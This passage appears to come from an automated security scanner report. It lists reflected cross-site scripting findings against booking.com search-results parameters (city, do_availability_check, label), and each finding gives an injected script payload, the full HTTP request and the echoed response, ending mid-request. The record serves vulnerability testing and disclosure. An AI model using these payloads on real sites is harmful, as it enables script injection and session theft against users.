The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f2"><script>alert(1)</script>d04cfe96766 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717d18f2"><script>alert(1)</script>d04cfe96766&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:11 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKLF5DCyLyMK%2Fe%2BQ2GDMIsKJ1LcnaZGfXkgdWE14LACJyrSTbo27TKWmCpv3%2B8mndKVr09Xx6h5JHb7OSkHRVc1phxWcT6cfEf92NaVltPhi9zguRdOL8PTJ6vnFKJytxRHGkrkN0fHRT76M4pfKPOzdpEjIBwGkhE9F8NspuqSUfgBRD0OyIDLgFj1qX28wKkpB5VhcIL%2BhwjWY42CulfLKv6iemb%2FrbYBK5A1UhCq%2B3VdTd8sIU%2Fy8YGt%2FE0I0uoyW6Xi0YR4V5%2FsI6psC7%2BLhGRTotwa2M890oK2ixfL332hZ%2F8BkvUubop6aLha2aliYJJFubhyciLodLv%2BMqZXYckCzoEmV5iz9b2jBIax%2Bd%2FJevYnI2SWWZ2BWqg8WVSnGHCb0W1HpOE5KEnQm0wKLwJtE87PH8lsjjtleAasDQhBJhm%2BfEOWI%2FtDRnSHSie8FXJTgKiZeiwOTxV2yImVzU6UtPUTasypDlP99IE66ggkcaMZQTsQMBEoO%2Bf%2BnCr592VgLPcQrIGSFJEn75trrp6V50wegcMwreUa8qjeMC%2F%2BJ4elnDx%2BDY%2BnIkFEgvnUZV5nZFrrqBy5VrEQcbugdHiFNbqSr%2FEfn3E%2BR2J9lZF1FC%2BwRSK84kAKSwWofPQlYJfADJprkZ28%2FbfZj%2B9%2B1VE1In8%2FLCCSCqY6DIffl9iW279o%2Be65SlMLmQtmuniE4WRP0Zo0GbVSqWnvxPQ01pNllMJCQpGRZ2rq0b5UiT3UaqsSUz5Dx9ElLdB25i9qRwE2uaAlUMLJlbgKrGxYmqX6vCGrxCK9q66QPwfzW9YtmRvM36YK93FHhplLjthxw7I3qJGBLcy6OvnnxfcjnLCK1HvlT5NVnWcHV9HmqDwT842eGZqdAs9YCMYS6mfk4gcoZnrGTiEZfZsKIyimK5ezvMtohmUGU38agdXyTvCR9kDYE9oDedOOgWEcUAvZyPPDqdKgn8Xsp7avOQoOVc%2BHiqqjzEi4Bnjy2rs36r72q0vLUl8B6U0k0Skrm2FBszGhEZ%2BNv29y2sw38ptLHuHlraPoceo%2F0P9kcIR1YdMvMK%2F%2B2l1YjYzgIi%2BKT3sIzXnz1k97TqWk4tKyL7576a8bZ75ZFdIQ%2F%2BbQnn99JsZhVV%2FgCFBazbOJp6UkIgyRTz7VcZuhhjvsqk89vFMWp1qeLXkSza%2BZcO2KNk%2FxOfHswIWvWjdMdyfmlFYx6TH4VbC44U1skQOgQO9TlAFC6%2BY0zN9xv7NQhMrR6H6JuYnt%2FtksSmG9nQeE%2FPjvUYOoy5%2FPG4eytBSIow6t3D67NRNdkKL%2FaLocr7iDwgvTfQbc%2BDjGf6tgOQjrwCM9kQQJl6JMCW7Ctgg8fJmRNtSeFhUNcX6nusw4hsas6oFSULf97hrcWu0F3jSXDRgrhBdHJyFZEZxcUizUlPo%2FDXfDdOP7z4CO4aw; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 74083
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717d18f2"><script>alert(1)</script>d04cfe96766;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...
4.221. http://www.booking.com/searchresults.html [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31107'-alert(1)-'d919aaa0e9d was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=2006171731107'-alert(1)-'d919aaa0e9d&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:21 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZ8r5u8%2BxLxWndBreImM%2BIVq7jSpNwrIn5x6S9Oba%2FZTPkxANiQmHNrXoGm%2Bq4E6BqlJKU64iUn5IQE61rl2F6Ga0hw7r6wqzFlNKZDRZc%2F2eIOmGLotnbibM9VCJ8IopU8FybKvy2GovF7WPdJCa4RrrdH%2BGhJBfwmDOCL4zGorgVXO2RSJJbLET%2FL%2FB%2FvVHwawU5l9FAiJvzCCxfMkk4kJyEZM9j3Avkz%2F%2BlOCoUpviOLhQ%2F4lql8YceqVlHOVUmDnb0gbIHfmvecUlfFMuLDEN8qXfSDWEi8HG5h%2Bvsg%2BderYyWv0nJoRrGlw2CZRFxDYK%2F4%2BLiKapYp699AZkxVBt68pEC26LryVkzlEZH2KCxoRcm0oCqdfGMz%2BmLufLmoWu7bTW8QpMGLD3dlwHLBD069OLHtl5p6kDxRN%2BPNVvM3f%2Fq959awQXwlXH5W%2B0Fwt%2BoMzp9nAZOoiQw8tCHVLEIHoTiwrrwQZYuGAVeCfu3OOwM1jJ5FN7ZRSrVJDUwW%2F0jWXHMvUKjczfl2oHyDueSHfNuH3JMKgibSryEcAwKWRG2y7JouV8cby9DPFjyQD9clqp7qWc7L9DFzfyZz0i1pNHyIxWlV1kEB5lDGhuIUYo0A37f3vBxl5czltIfxbs7RrByiVRDRH%2B0AYSm0F6ViZzj%2FYsifguql8eNysExs6G68H7el6mfV8ua2rBR8Vh3SvhB2rOZ1GZWVDikHfgVlOdEQy87PMZTlRYQbx%2BPjegWF9NhfgqxvrI3soVDzc3iwX9sxnxQm14x8MCZJTpHEEPk3LDgBDo9OKxVnem7KX4Bp3s73aeppi2xvwbU2ZN81xMqUsi6xOwdAAZA9Xmu12Eo1K9z%2Fnd%2BpzpHd7G54KPrNoLPM0IniEpT7swwlNJDFRT1AgzltAG0ZOSVlxhrm99S236MK0Rnjwc2V9eBYskhO1M4VXW3utdsYxkQYVTnhTW4wXTkF981KP2xsYI4PLNSJOaeKjOwvHcAqsPtNNFSyWHLBn3VWQoywezzJt3RyRRUxb5OlK0Q7bRPasOliNKNbcSazRUje0N4Nz7Qqk6CkdaqpjfiIHJ%2BObCawRuA2Kd3U3Lt3sra6odyDD1%2BGoRtuRP2zodANjdZ0IpvA6m0cLXkaJwTVjCQD2hJhCmaOSfJ%2FCw2XnJ%2BWIz4QUf4d5HFVxqIcOLwUcQ0dKBiPNbo959XwTmyibY7xVZ1KwyKlxQ5WZwHm81cTAfxmGAz48eOBN%2F2oc3h%2FAAaLV4zplC95bWKMljh1r%2BoN1TEYjDOJUA14FYZwvmCcbSu2%2FGT7UUXz%2BXBu5XFPpARvc2TrT%2FiEIhRM5G8UX5XApEfJOOaeeRjhUZ47EohH%2Fz7mj%2Bn4Yxo4uCcUST7pxORoNyBQ6YdhI36Ydps%2F2eTMM2%2BcwJ7IPPMbgs%2FOxygQuTY5w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:22 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 74024
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
vent_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=2006171731107'-alert(1)-'d919aaa0e9d;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Roo
...[SNIP]...
4.222. http://www.booking.com/searchresults.html [do_availability_check parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the do_availability_check request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 241d5"><script>alert(1)</script>c693cd0ec72 was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1241d5"><script>alert(1)</script>c693cd0ec72&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:27 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FadgG6c5SxD4aid1EHwSrafOMxcdczliGE6pI96UCUaChZ8AHgVMcuyemt5od5JE3EgU855Gq1vfVUuXnSBJU%2B3lUAtBhYLyXVgw5jaKRTu1dLT6JTmprya8%2FgmQ90g56i8TUsQ5CCS4RLMSvz1juaVV%2BGn6eJhJgLPDmYtmW67ocnRA4fLwc4if14Cy1PjqbA7GVqHWB04kLXc29JJGU1ZQEI8vmupyNkZRCwIZp32Km0KOk58RBEg%2BIxWbX5ENkUNFl%2BLB4AbUfwFbbxM4PnglJGDss8M329FUJL0yQTB7isi8lkB3s%2B2r05rCg3oCB3YtiZSvlu1ctX%2FDNFOWUjh12L8xenNTAVTByMQXBQG5zOPOqZzbnV7vXp5nWvdt0FTOFZwAz1W7Xzf7NOAt%2BRO96N39xqcFlMHYbVgLYEvbVvPjrzhoSJOIDg0B7ymtZ5xJdwoK3VBS1uU3MODPUytRuw6jDZZfTQ88mfOnwrqejWbeBtwVGAmV0EAbD%2FuDcJcQr23c2NPBuogOuwizCVtyiLcWQw0VXSeLOGEtom8EeOmZz7cgxFD%2Fo2trA%2FMemyTyKcuR7mvs7WvXsNWFsN5j5GEyioO1tP%2Fss3dWUJ26uVBxNQTGP5vOpEcJye6DL7OPeqSjO6RWTuTE1REbwfv%2FTt8593Y3BAxpAjsFcv6ZapdlgndN4uL5aqMYRSCCeTpmyibjpZwSX%2B%2FNwseL8sS86LfIKqAdAoHrroHG5O2MHieMWp3uh00eP0D8Bx9hdcaXL3bmZW15HL2rOBKoMWfN3Xmp1JkoxWrOyny%2BuU0wOfOwcYYwgyfNNfnRuM62%2FjgvBwtDCgmpqnQukoZH7tbz2mF9YNnmiPDXLe0C1FDDFtdL6wgnDLFIFGaANugYWFOKtg%2FxnM3O7xyj3YObEDusoAtDsRPKswe4aJ0gYgeJZYGrCh8v%2FPsMfYVNqC9nEPN0NjtjS854Mk9mwDRx2VUWnC4ZviYTSG00u44G6pC%2F4p6stPiA5lZXx%2BYdOjC4r1N%2Fs9Pf1F6f9eFc03H8TCGo4XoxEcmQlUCayCiKUMGmVTDizuwyvTlGop2ZvyWb4L%2B6E3Mqqyru5fXB380%2BFbYJutw5fRVIYGTsYFJfQM1YxWU64DlZRWs5N0TjeB1PawMafnu5qf32rQnJqlAxQGIvuze88oTPKtvXTs4D5eIqRERLUtTMxSVe6tPyh%2BTIanL6Vqph3HUt7LOLeUr4Tm%2BB4LTNboEWO8ljCAxHpF4HXKDhGHu3y0u%2F%2FWZQ7dzaFLhuCLgIgBqyVPS8eWNzk5%2FeY4xWvNKHb%2Fx2neF%2FZXNbcbcStV04yGjsembsy08i%2B9zRDd9UMjG1EHnDhFV7s7QaRz2KOzSv4wqoZabkKKKCmRzlYHQAzeVDc9rxdtYOmfuYZMfMAZjjA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:28 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 392613
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
nk" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1241d5"><script>alert(1)</script>c693cd0ec72&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...
4.223. http://www.booking.com/searchresults.html [do_availability_check parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the do_availability_check request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3a7e</script><script>alert(1)</script>ea78450c27a was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1c3a7e</script><script>alert(1)</script>ea78450c27a&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:53 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85r18OTZ9lRoP8elUE0dmw8%2FZhpzeT%2BK4hAwg2A7xSkue5aXj8iDpRCv48zvdAT7pKC1dSIOa9Na5R0%2B%2B53Kbb0h3pLB1EiIcvX%2ByxMqQD6KySxQIPeENSCd9h1YEcALcJnnHnBQp5p75xchIQl1aD1BVKINVzxzhzXXNtW18qIMxwgxUol1xC6Keq1woll7upc6M9F15La%2FwgLi3EFLYLLGEIrCQQLMNgVMgmroSkaqgE4vtvmPM6yAMRtIwYq54hPOFLrTcy%2F2wYzZLBUUnnUZmYdj%2FpI6aIeMztpC%2BypNYMbLwrwZTkmz161Nv53iAsOaXTvAV8pzQIIUVAuZGSTQyFlF5olAIJKbtW8PK5QqRVRUJuYNeGYBS%2FZir4zBCkVSoGnVl2C6NwceXbcIQFzEcRY8yt%2F7CAtMfCQEcDHDFVXRT9vYVX077S42zp22a0j%2BSn7aRQ7OLVw72kSGvYxaQp5Dji9cM6ayi8IcXP4hyHIc2B01Q75WiUkRRbnjfzcaKjlByl%2F3N0Hl0KzBEOx1xo8Uz0%2FR%2BZO44gFny8Mw73HKJ0QawML%2F43GMIVRGyDWq%2Bt0QxH6qVYD%2BGmGSpDbLvriMGSieEzpLj%2FDLj3mgMOH1pcDLf9ZurwbA%2BVmVVp3osHlXxcOvlTRRcamlnuPx6vrVQGzkLCSQoyCxYUYGn6rI4x1VK6o2g0DebFMyRy5pEfBzHHqjejh0EVqsd536%2FKCNtO36u%2BU5VwAMQJZl2Rwx3oBjCmXNDXdtdS1VcPK1i7PiojvhONnedB8Zwd2TwF2NYexfQ1X0pZQ%2BmNsxTCWuv3aC5NX5NyDIlRFJMNaqPHniWw7bQANuvEVZdHa%2FPtQZSt2XtxkXh5AQ%2BxAGy%2BJpoxXArsbPFCy0pD7B7t8NLwmdpup%2BfLuWgjUOCkv08HBjD8JFBF8oGGe1YwqnUEzS1U8MfkLiGamdfSrUHcuht5Siovs2%2BnZn%2BAYEP35ovtNvL3F2SPFjrVb9GVm1RVrRzTS%2Fvbn2ddOiB49gKx0U0042Dp6AKvDL4xGa04azDxRjEoxnORykr39JkbAjTJK90en9hqxAc8NN8WJS9cvMh9NVmGpmIUmWAMYWb14ab32hkWvS%2BpT6%2FNVpFARjI5EOxQot7L82gcupJUKM6FgadMkZ%2FNMkSU3fGuObOQ1e%2FMY55tl9afDgi0kDUTi7beZgu8IqeXgduSVVh54OJ4BX4N1st2p8S7O8OWI9o%2FjklR6nRDXqGGm9r1mfX9GAgazy2APL29Q2ttTw1%2BJBuMAAbn2E92jHBNFVGJxwz4drqUd82LShp9sBw0KtkMHOAhncT7I8fnbJut0Go0Hq5ksnjgpw7wS3hj19chBn%2B7iK5ZBXTUUUTvEZxyjkKxoGyuqsy%2BdkdfLaWHkFNF%2BURvjEZfdXo%2BKi9RBXQR4ydP2%2FMdVuEqzzEGiw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:15:54 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 392796
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
s',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1c3a7e</script><script>alert(1)</script>ea78450c27a&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_u
...[SNIP]...
4.224. http://www.booking.com/searchresults.html [label parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the label request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f4"><script>alert(1)</script>0924bec2c54 was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717b92f4"><script>alert(1)</script>0924bec2c54&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
